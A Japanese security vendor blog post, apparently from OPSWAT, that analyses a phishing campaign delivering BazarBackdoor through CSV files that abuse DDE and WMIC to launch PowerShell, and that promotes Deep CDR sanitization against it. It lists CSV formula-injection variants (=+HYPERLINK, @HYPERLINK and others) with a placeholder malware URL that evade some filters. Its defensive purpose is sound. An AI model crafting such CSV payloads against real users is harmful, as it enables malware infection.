2022年2月、マルウェア研究者のChris Campbellは、特別に細工されたCSV(カンマ区切り値)テキストファイルを使用し、ユーザーのデバイスをトロイの木馬BazarBackdoorに感染させる新たなフィッシングキャンペーンを発見しました。このブログ記事では、攻撃シナリオを分析し、この巧妙な攻撃を防ぐ方法を紹介します。 Deep CDR
(Content Disarm and Reconstruction)を使ってこの巧妙な攻撃を防ぐ方法を紹介します。
攻撃戦術
このフィッシング・キャンペーンでは、サイバー犯罪者はCSVファイル(表形式でデータを保存し、値の区切りにカンマを使用する区切りテキストファイル)を利用した。このファイルタイプは、データベースやアプリケーション間で単純なデータを交換するための一般的な方法です。CSVファイルは単にテキストを含むだけで実行可能なコードが含まれていないため、多くのユーザーは無害だと考え、注意することなくすぐにドキュメントを開いてしまう。Microsoft ExcelやOpenOffice CalcのようなDynamic Data Exchange (DDE)をサポートするアプリケーションでCSVファイルを開くと、マルウェアが自分のデバイスに侵入する脅威の媒介となる可能性があることを知らないのだ。これらのアプリケーションは、CSVファイル内の数式や関数を実行することができます。脅威の作成者は、このDDE機能を悪用して任意のコマンドを実行し、トロイの木馬BazarBackdoorをダウンロードしてインストールすることで、不注意な被害者のデバイスから企業ネットワークへの完全なアクセスを侵害します。MS Office ファイルに悪意のあるマクロや VBA コードを隠した一般的な攻撃アプローチと比較すると、DDE ドキュメント内に隠された脅威は検出が困難です。
ファイルを注意深く調べると、データの列の1つに=WmiC|コマンド(Windows Management Interfaceコマンド)が含まれているのがわかる。被害者がうっかりこのDDE関数を実行させてしまうと、PowerShellコマンドが作成される。そしてコマンドはリモートURLを開いてBazarLoaderをダウンロードし、BazarBackdoorが被害者のマシンにインストールされる。
Deep CDR が DDE 攻撃の防御に役立つ方法
電子メールに添付されたファイルをユーザーに届く前にサニタイズすることで、このような巧妙なフィッシング・キャンペーンからネットワークを保護することができます。Deep CDR は、すべてのファイルが潜在的な脅威であると考え、検知だけでなく予防に重点を置いています。Deep CDR は、MetaDefender に含まれる 6 つの主要テクノロジーの 1 つです。OPSWATは、Zero Trust の哲学を真に取り入れた高度な脅威対策プラットフォームです。
以下は、感染したCSVファイルをMetaDefender Core 処理した後のサニタイズの詳細です。 Cloud参照してください)。Deep CDR ファイル内の数式を無効化したため、PowerShellコマンドは作成されませんでした。マルウェアはダウンロードできませんでした。
同様の攻撃では、脅威の作成者は検出を回避するためにより複雑な数式を使用する。通常、MS Excelの数式は等号(=)で始まる。しかし、このアプリケーションは"="だけでなく、"=+"や"@"などの異なる記号で始まる数式も受け付けるため、CSVファイルの破壊的な数式は以下のようになります:
=+HYPERLINK("<malware URL>")
=-HYPERLINK("<malware URL>")
=@HYPERLINK("<malware URL>")
+@HYPERLINK("<malware URL>")
-@HYPERLINK("<malware URL>")
この種の数式は、いくつかの一般的なCDRシステムを逃れることができる。しかし、Deep CDR はこの手口を簡単に処理し、クリーンで安全に消費できるファイルを出力することで、脅威を無効化することができます。
について詳しく知る Deep CDRをご覧いただくか、 OPSWAT テクニカルエキスパートにご相談ください。ゼロデイ攻撃や高度な回避型マルウェアから企業ネットワークとユーザーを保護するための最適なセキュリティソリューションをご紹介します。
